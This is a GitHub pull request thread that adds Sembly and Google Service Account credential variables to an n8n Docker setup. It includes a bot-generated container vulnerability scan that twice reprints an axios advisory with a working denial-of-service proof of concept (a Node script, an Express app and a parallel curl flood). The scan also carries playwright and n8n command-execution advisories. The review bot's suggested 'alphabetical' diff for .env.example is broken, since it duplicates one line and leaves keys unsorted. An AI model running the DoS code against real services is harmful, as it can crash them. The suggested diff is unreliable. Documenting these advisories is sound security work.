Update environment configuration for MN Service credentials in n8n

[SashkoMarchuk]

• Added new environment variables for Sembly and Google Service Account credentials.
• Updated configuration files to include new MN Service environment variables for seamless integration.

These changes improve the n8n service by providing required credentials for MN Service integration.

Additional descriptions:

I created this PR to enable Domain-Wide Delegation (DWD) in Google Workspace, allowing n8n to update event descriptions across all users in the company calendar.
This setup is required to automatically insert the Meeting Resources section into event descriptions for every scheduled call.

Changes made:

• Added a new environment variable containing the Google Service Account JSON credentials.

Task: #65518 MN Service. Investigate Google Calendar Event Update for Meeting Resources (All Attendees)

Summary by CodeRabbit

• Chores
  • Added Sembly service credentials to configuration files.
  • Added Google Service Account credential variables for the MN service to Docker Compose and environment setup.
  • Updated both development and production Docker Compose configurations and example environment files with new credential variables.

[coderabbitai]

Walkthrough

Environment variables for MN Service credentials are added across configuration files, introducing Sembly service authentication and Google Service Account configuration for the n8n service across development and production setups.

Changes

Cohort / File(s)	Summary
MN Service Credentials Configuration .env.example, docker-compose.yml, docker-compose.prod.yml	Added Sembly service credentials (SEMBLY_USER, SEMBLY_PASS) and Google Service Account configuration variables (MN_SERVICE_SA_GOOGLE_*) for MN Service integration across environment config and Docker Compose manifests.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~8 minutes

• Homogeneous additions of environment variable declarations across three related configuration files
• No logic changes or control flow modifications
• Primary review focus: verify consistency of variable naming and presence across all three files

Possibly related PRs

• Add security configurations and authentication environment variables … #104: Modifies the same Sembly credential environment variables (SEMBLY_USER, SEMBLY_PASS) in Docker Compose files, indicating potential overlap or sequential configuration updates.

Suggested reviewers

• killev

Poem

🐰 A rabbit hops through configs with glee,
Adding credentials, one, two, three!
Sembly whispers, Google keys gleam,
MN Service fulfills the dream! ✨

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)

Check name	Status	Explanation	Resolution
Docstring Coverage	⚠️ Warning	Docstring coverage is 0.00% which is insufficient. The required threshold is 80.00%.	You can run @coderabbitai generate docstrings to improve docstring coverage.

✅ Passed checks (2 passed)

Check name	Status	Explanation
Title Check	✅ Passed	The PR title "Update environment configuration for MN Service credentials in n8n" clearly and accurately summarizes the main change in the changeset. The pull request adds new environment variables for Sembly and Google Service Account credentials across three configuration files (.env.example, docker-compose.yml, and docker-compose.prod.yml), which is directly captured by the title. The title is specific (mentioning MN Service credentials), concise, and avoids vague terminology or noise, making it clear to developers reviewing the history what the primary change addresses.
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.

✨ Finishing touches

• 📝 Generate docstrings

🧪 Generate unit tests (beta)

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch feat/mn-service-packages-envs

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[github-actions]

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest

digest	sha256:157ff5a35e134ed4faad215e8f852a009b696a1c7e62b9e273c95f20842f5c89
vulnerabilities
platform	linux/amd64
size	335 MB
packages	1844

📦 Base Image node:22-alpine

also known as	22-alpine3.22 22.19-alpine 22.19-alpine3.22 22.19.0-alpine 22.19.0-alpine3.22 jod-alpine jod-alpine3.22 lts-alpine lts-alpine3.22
digest	sha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
vulnerabilities

libxml2 2.13.8-r0 (apk) pkg:apk/alpine/libxml2@2.13.8-r0?os_name=alpine&os_version=3.22 Affected range <2.13.9-r0 Fixed version 2.13.9-r0 EPSS Score 0.438% EPSS Percentile 62nd percentile Description Affected range <2.13.9-r0 Fixed version 2.13.9-r0 EPSS Score 0.251% EPSS Percentile 48th percentile Description Affected range <2.13.9-r0 Fixed version 2.13.9-r0 EPSS Score 0.546% EPSS Percentile 67th percentile Description Affected range <2.13.9-r0 Fixed version 2.13.9-r0 EPSS Score 0.141% EPSS Percentile 35th percentile Description

xlsx 0.20.2 (npm) pkg:npm/xlsx@0.20.2 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities Affected range >=0 Fixed version Not Fixed CVSS Score 7.8 CVSS Vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H EPSS Score 4.328% EPSS Percentile 88th percentile Description All versions of SheetJS CE through 0.19.2 are vulnerable to "Prototype Pollution" when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected. A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/. OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities Affected range >=0 Fixed version Not Fixed CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.079% EPSS Percentile 24th percentile Description SheetJS Community Edition before 0.20.2 is vulnerable.to Regular Expression Denial of Service (ReDoS). A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.

axios 1.8.3 (npm) pkg:npm/axios@1.8.3 Allocation of Resources Without Limits or Throttling Affected range >=1.0.0 <1.12.0 Fixed version 1.12.0 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.025% EPSS Percentile 5th percentile Description Summary When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response. This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'. Details The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob. Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231): const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls); const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined); const protocol = parsed.protocol || supportedProtocols[0]; if (protocol === 'data:') { let convertedData; if (method !== 'GET') { return settle(resolve, reject, { status: 405, ... }); } convertedData = fromDataURI(config.url, responseType === 'blob', { Blob: config.env && config.env.Blob }); return settle(resolve, reject, { data: convertedData, status: 200, ... }); } The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27): export default function fromDataURI(uri, asBlob, options) { ... if (protocol === 'data') { uri = protocol.length ? uri.slice(protocol.length + 1) : uri; const match = DATA_URL_PATTERN.exec(uri); ... const body = match[3]; const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8'); if (asBlob) { return new _Blob([buffer], {type: mime}); } return buffer; } throw new AxiosError('Unsupported protocol ' + protocol, ...); } The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks. It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams. As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory. In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs. PoC const axios = require('axios'); async function main() { // this example decodes ~120 MB const base64Size = 160_000_000; // 120 MB after decoding const base64 = 'A'.repeat(base64Size); const uri = 'data:application/octet-stream;base64,' + base64; console.log('Generating URI with base64 length:', base64.length); const response = await axios.get(uri, { responseType: 'arraybuffer' }); console.log('Received bytes:', response.data.length); } main().catch(err => { console.error('Error:', err.message); }); Run with limited heap to force a crash: node --max-old-space-size=100 poc.js Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error: <--- Last few GCs ---> … FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory 1: 0x… node::Abort() … … Mini Real App PoC: A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS. import express from "express"; import morgan from "morgan"; import axios from "axios"; import http from "node:http"; import https from "node:https"; import { PassThrough } from "node:stream"; const keepAlive = true; const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 }); const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 }); const axiosClient = axios.create({ timeout: 10000, maxRedirects: 5, httpAgent, httpsAgent, headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" }, validateStatus: c => c >= 200 && c < 400 }); const app = express(); const PORT = Number(process.env.PORT || 8081); const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb"; app.use(express.json({ limit: BODY_LIMIT })); app.use(morgan("combined")); app.get("/healthz", (req,res)=>res.send("ok")); /** * POST /preview { "url": "<http|https|data URL>" } * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector). */ app.post("/preview", async (req, res) => { const url = req.body?.url; if (!url) return res.status(400).json({ error: "missing url" }); let u; try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); } // Developer allows using data:// in the allowlist const allowed = new Set(["http:", "https:", "data:"]); if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" }); const controller = new AbortController(); const onClose = () => controller.abort(); res.on("close", onClose); const before = process.memoryUsage().heapUsed; try { const r = await axiosClient.get(u.toString(), { responseType: "stream", maxContentLength: 8 * 1024, // Axios will ignore this for data: maxBodyLength: 8 * 1024, // Axios will ignore this for data: signal: controller.signal }); // stream only the first 64KB back const cap = 64 * 1024; let sent = 0; const limiter = new PassThrough(); r.data.on("data", (chunk) => { if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); } else { sent += chunk.length; limiter.write(chunk); } }); r.data.on("end", () => limiter.end()); r.data.on("error", (e) => limiter.destroy(e)); const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); limiter.pipe(res); } catch (err) { const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); res.status(502).json({ error: String(err?.message || err) }); } finally { res.off("close", onClose); } }); app.listen(PORT, () => { console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`); console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`); }); Run this app and send 3 post requests: SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \ | tee payload.json >/dev/null seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null``` Suggestions Enforce size limits For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit. Stream decoding Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

openssl 3.5.2-r0 (apk) pkg:apk/alpine/openssl@3.5.2-r0?os_name=alpine&os_version=3.22 Affected range <3.5.4-r0 Fixed version 3.5.4-r0 EPSS Score 0.026% EPSS Percentile 6th percentile Description

playwright 1.54.2 (npm) pkg:npm/playwright@1.54.2 Improper Verification of Cryptographic Signature Affected range <1.55.1 Fixed version 1.55.1 CVSS Score 8.7 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H EPSS Score 0.027% EPSS Percentile 6th percentile Description Summary Use of curl with the -k (or --insecure) flag in installer scripts allows attackers to deliver arbitrary executables via Man-in-the-Middle (MitM) attacks. This can lead to full system compromise, as the downloaded files are installed as privileged applications. Details The following scripts in the microsoft/playwright repository at commit bee11cbc28f24bd18e726163d0b9b1571b4f26a8 use curl -k to fetch and install executable packages without verifying the authenticity of the SSL certificate: packages/playwright-core/bin/reinstall_chrome_beta_mac.sh packages/playwright-core/bin/reinstall_chrome_stable_mac.sh packages/playwright-core/bin/reinstall_msedge_dev_mac.sh packages/playwright-core/bin/reinstall_msedge_beta_mac.sh packages/playwright-core/bin/reinstall_msedge_stable_mac.sh In each case, the shell scripts download a browser installer package using curl -k and immediately install it: curl --retry 3 -o ./<pkg-file> -k <url> sudo installer -pkg /tmp/<pkg-file> -target / Disabling SSL verification (-k) means the download can be intercepted and replaced with malicious content. PoC A high-level exploitation scenario: An attacker performs a MitM attack on a network where the victim runs one of these scripts. The attacker intercepts the HTTPS request and serves a malicious package (for example, a trojaned browser installer). Because curl -k is used, the script downloads and installs the attacker's payload without any certificate validation. The attacker's code is executed with system privileges, leading to full compromise. No special configuration is needed: simply running these scripts on any untrusted or hostile network is enough. Impact This is a critical Remote Code Execution (RCE) vulnerability due to improper SSL certificate validation (CWE-295: Improper Certificate Validation). Any user or automation running these scripts is at risk of arbitrary code execution as root/admin, system compromise, data theft, or persistent malware installation. The risk is especially severe because browser packages are installed with elevated privileges and the scripts may be used in CI/CD or developer environments. Fix microsoft/playwright@72c62d8 chore: do not use -k option microsoft/playwright#37532 https://github.com/microsoft/playwright/releases/tag/v1.56.0 Credit This vulnerability was uncovered by tooling by Socket This vulnerability was confirmed by @evilpacket This vulnerability was reported by @JLLeitschuh at Socket Disclosure September 10th, 2025 - Disclosed to Microsoft privately via https://github.com/microsoft/playwright/security/advisories/GHSA-gx27-2j22-qcx8 September 11th, 2025 - Reported to Microsoft via MSRC Researcher Portal - https://msrc.microsoft.com/report/vulnerability/VULN-162854 September 11th, 2025 - Microsoft closed report as "Complete - N/A" September 18th, 2025 - Following a LinkedIn Post

n8n-nodes-base 1.107.0 (npm) pkg:npm/n8n-nodes-base@1.107.0 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Affected range <=1.113.0 Fixed version Not Fixed CVSS Score 8.8 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Description Impact The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted. An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise. This vulnerability affects all n8n deployments where: The Execute Command node is enabled, and Not all user accounts are strictly controlled and trusted. n8n.cloud is not impacted. Patches No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required. Future n8n versions may change the default availability of this node. Workarounds Administrators can disable the Execute Command node by setting the following environment variable before starting n8n: export NODES_EXCLUDE: "[\"n8n-nodes-base.executeCommand\"]" References n8n docs: Execute Command n8n docs: Blocking nodes

curl 8.14.1-r1 (apk) pkg:apk/alpine/curl@8.14.1-r1?os_name=alpine&os_version=3.22 Affected range <8.14.1-r2 Fixed version 8.14.1-r2 EPSS Score 0.077% EPSS Percentile 24th percentile Description

openssh 10.0_p1-r7 (apk) pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22 Affected range <=10.0_p1-r7 Fixed version Not Fixed EPSS Score 0.008% EPSS Percentile 1st percentile Description

n8n 1.109.2 (npm) pkg:npm/n8n@1.109.2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Affected range <=1.114.4 Fixed version Not Fixed CVSS Score 8.8 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Description Impact The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted. An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise. This vulnerability affects all n8n deployments where: The Execute Command node is enabled, and Not all user accounts are strictly controlled and trusted. n8n.cloud is not impacted. Patches No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required. Future n8n versions may change the default availability of this node. Workarounds Administrators can disable the Execute Command node by setting the following environment variable before starting n8n: export NODES_EXCLUDE: "[\"n8n-nodes-base.executeCommand\"]" References n8n docs: Execute Command n8n docs: Blocking nodes

axios 1.11.0 (npm) pkg:npm/axios@1.11.0 Allocation of Resources Without Limits or Throttling Affected range >=1.0.0 <1.12.0 Fixed version 1.12.0 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.025% EPSS Percentile 5th percentile Description Summary When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response. This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'. Details The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob. Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231): const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls); const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined); const protocol = parsed.protocol || supportedProtocols[0]; if (protocol === 'data:') { let convertedData; if (method !== 'GET') { return settle(resolve, reject, { status: 405, ... }); } convertedData = fromDataURI(config.url, responseType === 'blob', { Blob: config.env && config.env.Blob }); return settle(resolve, reject, { data: convertedData, status: 200, ... }); } The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27): export default function fromDataURI(uri, asBlob, options) { ... if (protocol === 'data') { uri = protocol.length ? uri.slice(protocol.length + 1) : uri; const match = DATA_URL_PATTERN.exec(uri); ... const body = match[3]; const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8'); if (asBlob) { return new _Blob([buffer], {type: mime}); } return buffer; } throw new AxiosError('Unsupported protocol ' + protocol, ...); } The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks. It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams. As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory. In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs. PoC const axios = require('axios'); async function main() { // this example decodes ~120 MB const base64Size = 160_000_000; // 120 MB after decoding const base64 = 'A'.repeat(base64Size); const uri = 'data:application/octet-stream;base64,' + base64; console.log('Generating URI with base64 length:', base64.length); const response = await axios.get(uri, { responseType: 'arraybuffer' }); console.log('Received bytes:', response.data.length); } main().catch(err => { console.error('Error:', err.message); }); Run with limited heap to force a crash: node --max-old-space-size=100 poc.js Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error: <--- Last few GCs ---> … FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory 1: 0x… node::Abort() … … Mini Real App PoC: A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS. import express from "express"; import morgan from "morgan"; import axios from "axios"; import http from "node:http"; import https from "node:https"; import { PassThrough } from "node:stream"; const keepAlive = true; const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 }); const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 }); const axiosClient = axios.create({ timeout: 10000, maxRedirects: 5, httpAgent, httpsAgent, headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" }, validateStatus: c => c >= 200 && c < 400 }); const app = express(); const PORT = Number(process.env.PORT || 8081); const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb"; app.use(express.json({ limit: BODY_LIMIT })); app.use(morgan("combined")); app.get("/healthz", (req,res)=>res.send("ok")); /** * POST /preview { "url": "<http|https|data URL>" } * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector). */ app.post("/preview", async (req, res) => { const url = req.body?.url; if (!url) return res.status(400).json({ error: "missing url" }); let u; try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); } // Developer allows using data:// in the allowlist const allowed = new Set(["http:", "https:", "data:"]); if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" }); const controller = new AbortController(); const onClose = () => controller.abort(); res.on("close", onClose); const before = process.memoryUsage().heapUsed; try { const r = await axiosClient.get(u.toString(), { responseType: "stream", maxContentLength: 8 * 1024, // Axios will ignore this for data: maxBodyLength: 8 * 1024, // Axios will ignore this for data: signal: controller.signal }); // stream only the first 64KB back const cap = 64 * 1024; let sent = 0; const limiter = new PassThrough(); r.data.on("data", (chunk) => { if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); } else { sent += chunk.length; limiter.write(chunk); } }); r.data.on("end", () => limiter.end()); r.data.on("error", (e) => limiter.destroy(e)); const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); limiter.pipe(res); } catch (err) { const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); res.status(502).json({ error: String(err?.message || err) }); } finally { res.off("close", onClose); } }); app.listen(PORT, () => { console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`); console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`); }); Run this app and send 3 post requests: SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \ | tee payload.json >/dev/null seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null``` Suggestions Enforce size limits For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit. Stream decoding Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

tar-fs 2.1.3 (npm) pkg:npm/tar-fs@2.1.3 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range >=2.0.0 <2.1.4 Fixed version 2.1.4 CVSS Score 8.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N EPSS Score 0.024% EPSS Percentile 5th percentile Description Impact v3.1.0, v2.1.3, v1.16.5 and below Patches Has been patched in 3.1.1, 2.1.4, and 1.16.6 Workarounds You can use the ignore option to ignore non files/directories. ignore (_, header) { // pass files & directories, ignore e.g. symlinks return header.type !== 'file' && header.type !== 'directory' } Credit Reported by: Mapta / BugBunny_ai

expat 2.7.1-r0 (apk) pkg:apk/alpine/expat@2.7.1-r0?os_name=alpine&os_version=3.22 Affected range <2.7.2-r0 Fixed version 2.7.2-r0 EPSS Score 0.102% EPSS Percentile 29th percentile Description

[coderabbitai]

Actionable comments posted: 1

🧹 Nitpick comments (1)

.env.example (1)

81-97: Reorder environment variables alphabetically.

Static analysis flagged 10 key ordering violations. The MN Service credentials block should follow alphabetical ordering conventions to maintain consistency with project standards (as indicated by dotenv-linter).

Apply this diff to sort the variables alphabetically:

 # MN Service credentials
 ## Sembly credentials
-SEMBLY_USER=sembly_user
 SEMBLY_PASS=sembly_pass
+SEMBLY_USER=sembly_user
 
 ## MN Service — Google Service Account (SA)
-MN_SERVICE_SA_GOOGLE_TYPE=service_account
-MN_SERVICE_SA_GOOGLE_PROJECT_ID=mock-project-id
-MN_SERVICE_SA_GOOGLE_PRIVATE_KEY_ID=mock-private-key-id
 MN_SERVICE_SA_GOOGLE_PRIVATE_KEY="-----BEGIN PRIVATE KEY-----\nMOCK_PRIVATE_KEY_CONTENT\n-----END PRIVATE KEY-----\n"
+MN_SERVICE_SA_GOOGLE_TYPE=service_account
+MN_SERVICE_SA_GOOGLE_PROJECT_ID=mock-project-id
+MN_SERVICE_SA_GOOGLE_PRIVATE_KEY_ID=mock-private-key-id
-MN_SERVICE_SA_GOOGLE_CLIENT_EMAIL=mock-service-account@mock-project-id.iam.gserviceaccount.com
-MN_SERVICE_SA_GOOGLE_CLIENT_ID=000000000000000000000
-MN_SERVICE_SA_GOOGLE_AUTH_URI=https://accounts.google.com/o/oauth2/auth
-MN_SERVICE_SA_GOOGLE_TOKEN_URI=https://oauth2.googleapis.com/token
+MN_SERVICE_SA_GOOGLE_AUTH_PROVIDER_X509_CERT_URL=https://www.googleapis.com/oauth2/v1/certs
 MN_SERVICE_SA_GOOGLE_AUTH_PROVIDER_X509_CERT_URL=https://www.googleapis.com/oauth2/v1/certs
+MN_SERVICE_SA_GOOGLE_AUTH_URI=https://accounts.google.com/o/oauth2/auth
+MN_SERVICE_SA_GOOGLE_CLIENT_EMAIL=mock-service-account@mock-project-id.iam.gserviceaccount.com
+MN_SERVICE_SA_GOOGLE_CLIENT_ID=000000000000000000000
 MN_SERVICE_SA_GOOGLE_CLIENT_X509_CERT_URL=https://www.googleapis.com/robot/v1/metadata/x509/mock-service-account%40mock-project-id.iam.gserviceaccount.com
+MN_SERVICE_SA_GOOGLE_TOKEN_URI=https://oauth2.googleapis.com/token
 MN_SERVICE_SA_GOOGLE_UNIVERSE_DOMAIN=googleapis.com

📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 0dc0722 and 7612ec0.

📒 Files selected for processing (3)

• .env.example (1 hunks)
• Dockerfile.n8n (2 hunks)
• docker-compose.yml (1 hunks)

🧰 Additional context used

📓 Path-based instructions (4)

Dockerfile.{n8n,temporal}

📄 CodeRabbit inference engine (.cursor/rules/docker-configuration.mdc)

Custom Docker images must be defined using Dockerfile.n8n and Dockerfile.temporal, each extending their respective official base images with custom configurations

Files:

• Dockerfile.n8n

Dockerfile.n8n

📄 CodeRabbit inference engine (.cursor/rules/project-structure.mdc)

Use Dockerfile.n8n for custom n8n image configuration.

Files:

• Dockerfile.n8n

.env*

📄 CodeRabbit inference engine (.cursor/rules/service-configuration.mdc)

Create .env file from .env.example for environment configuration

Files:

• .env.example

docker-compose.yml

📄 CodeRabbit inference engine (.cursor/rules/docker-configuration.mdc)

docker-compose.yml: All service configurations, including service dependencies, volume mounts, network configuration, environment variables, and port mappings, must be defined in docker-compose.yml
Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)

The repository must include a docker-compose.yml file as the main service orchestration configuration.

Use docker compose up -d to start all services

Files:

• docker-compose.yml

🪛 dotenv-linter (4.0.0)

.env.example

[warning] 84-84: [UnorderedKey] The SEMBLY_PASS key should go before the SEMBLY_USER key

(UnorderedKey)

---

[warning] 88-88: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_PROJECT_ID key should go before the MN_SERVICE_SA_GOOGLE_TYPE key

(UnorderedKey)

---

[warning] 89-89: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_PRIVATE_KEY_ID key should go before the MN_SERVICE_SA_GOOGLE_PROJECT_ID key

(UnorderedKey)

---

[warning] 90-90: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_PRIVATE_KEY key should go before the MN_SERVICE_SA_GOOGLE_PRIVATE_KEY_ID key

(UnorderedKey)

---

[warning] 91-91: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_CLIENT_EMAIL key should go before the MN_SERVICE_SA_GOOGLE_PRIVATE_KEY key

(UnorderedKey)

---

[warning] 92-92: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_CLIENT_ID key should go before the MN_SERVICE_SA_GOOGLE_PRIVATE_KEY key

(UnorderedKey)

---

[warning] 93-93: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_AUTH_URI key should go before the MN_SERVICE_SA_GOOGLE_CLIENT_EMAIL key

(UnorderedKey)

---

[warning] 94-94: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_TOKEN_URI key should go before the MN_SERVICE_SA_GOOGLE_TYPE key

(UnorderedKey)

---

[warning] 95-95: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_AUTH_PROVIDER_X509_CERT_URL key should go before the MN_SERVICE_SA_GOOGLE_AUTH_URI key

(UnorderedKey)

---

[warning] 96-96: [UnorderedKey] The MN_SERVICE_SA_GOOGLE_CLIENT_X509_CERT_URL key should go before the MN_SERVICE_SA_GOOGLE_PRIVATE_KEY key

(UnorderedKey)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (3)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
